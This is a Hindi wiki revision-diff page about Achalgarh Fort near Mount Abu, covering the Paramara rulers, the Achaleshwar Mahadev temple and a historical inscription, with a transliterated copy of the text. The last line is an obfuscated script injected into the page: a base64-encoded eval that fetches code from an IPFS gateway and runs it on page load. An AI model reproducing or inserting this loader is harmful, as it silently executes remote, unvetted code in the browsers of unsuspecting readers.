Difference between revisions of "अचलगढ़ क़िला"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
[[माउंट आबू]] [[राजस्थान]] का एकमात्र हिल स्टेशन है। माउंट आबू में अनेक पर्यटन स्थल हैं। इनमें कुछ शहर से दूर हैं तो कुछ शहर के आसपास ही हैं।
+
*[[माउंट आबू]] [[राजस्थान]] का एकमात्र हिल स्टेशन है। माउंट आबू में अनेक पर्यटन स्थल हैं। इनमें कुछ शहर से दूर हैं तो कुछ शहर के आसपास ही हैं।
 
 
 
*[[दिलवाड़ा जैन मंदिर माउंट आबू|दिलवाड़ा के मंदिरों]] से 8 किमी. उत्तर पूर्व में यह क़िला और मंदिर स्थित हैं।  
 
*[[दिलवाड़ा जैन मंदिर माउंट आबू|दिलवाड़ा के मंदिरों]] से 8 किमी. उत्तर पूर्व में यह क़िला और मंदिर स्थित हैं।  
 +
*राजस्थान में आबू के निकट अवस्थित अचलगढ़ पूर्व मध्यकाल में [[मालवा]] के परमारों की राजधानी रहा है।
 
*अचलगढ़ क़िला [[मेवाड़]] के राजा [[राणा कुंभ]] ने एक पहाड़ी के ऊपर बनवाया था।  
 
*अचलगढ़ क़िला [[मेवाड़]] के राजा [[राणा कुंभ]] ने एक पहाड़ी के ऊपर बनवाया था।  
 +
*परमारों एवं चौहानों के इष्टदेव अचलेश्वर महादेव का प्राचीन मन्दिर अचलगढ़ में ही है।
 
*पहाड़ी के तल पर 15वीं शताब्दी में बना अचलेश्वर मंदिर है जो भगवान [[शिव]] को समर्पित है।  
 
*पहाड़ी के तल पर 15वीं शताब्दी में बना अचलेश्वर मंदिर है जो भगवान [[शिव]] को समर्पित है।  
 
*कहा जाता है कि यहाँ भगवान शिव के पैरों के निशान हैं।  
 
*कहा जाता है कि यहाँ भगवान शिव के पैरों के निशान हैं।  
 
*नजदीक ही 16वीं शताब्दी में बने काशीनाथ जैन मंदिर भी हैं।
 
*नजदीक ही 16वीं शताब्दी में बने काशीनाथ जैन मंदिर भी हैं।
 +
*अचलगढ़ से प्राप्त एक शिलालेख से आबू के परमारों एवं सोलंकियों के इतिहास का अभिज्ञान होता है।
 +
*इस शिलालेख से यह ज्ञात होता है, कि देलवाड़ा के विश्व प्रसिद्ध मन्दिर के निर्माताओं- यथा वस्तुपाल एवं तेजपाल ने जैन होने पर भी कई शिव मन्दिरों का उद्धार करवाया था।
 +
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=

Revision as of 07:33, 28 October 2010

  • mauant aboo rajasthan ka ekamatr hil steshan hai. mauant aboo mean anek paryatan sthal haian. inamean kuchh shahar se door haian to kuchh shahar ke asapas hi haian.
  • dilava da ke mandiroan se 8 kimi. uttar poorv mean yah qila aur mandir sthit haian.
  • rajasthan mean aboo ke nikat avasthit achalagadh poorv madhyakal mean malava ke paramaroan ki rajadhani raha hai.
  • achalagadh qila meva d ke raja rana kuanbh ne ek paha di ke oopar banavaya tha.
  • paramaroan evan chauhanoan ke ishtadev achaleshvar mahadev ka prachin mandir achalagadh mean hi hai.
  • paha di ke tal par 15vian shatabdi mean bana achaleshvar mandir hai jo bhagavan shiv ko samarpit hai.
  • kaha jata hai ki yahaan bhagavan shiv ke pairoan ke nishan haian.
  • najadik hi 16vian shatabdi mean bane kashinath jain mandir bhi haian.
  • achalagadh se prapt ek shilalekh se aboo ke paramaroan evan solankiyoan ke itihas ka abhijnan hota hai.
  • is shilalekh se yah jnat hota hai, ki delava da ke vishv prasiddh mandir ke nirmataoan- yatha vastupal evan tejapal ne jain hone par bhi kee shiv mandiroan ka uddhar karavaya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>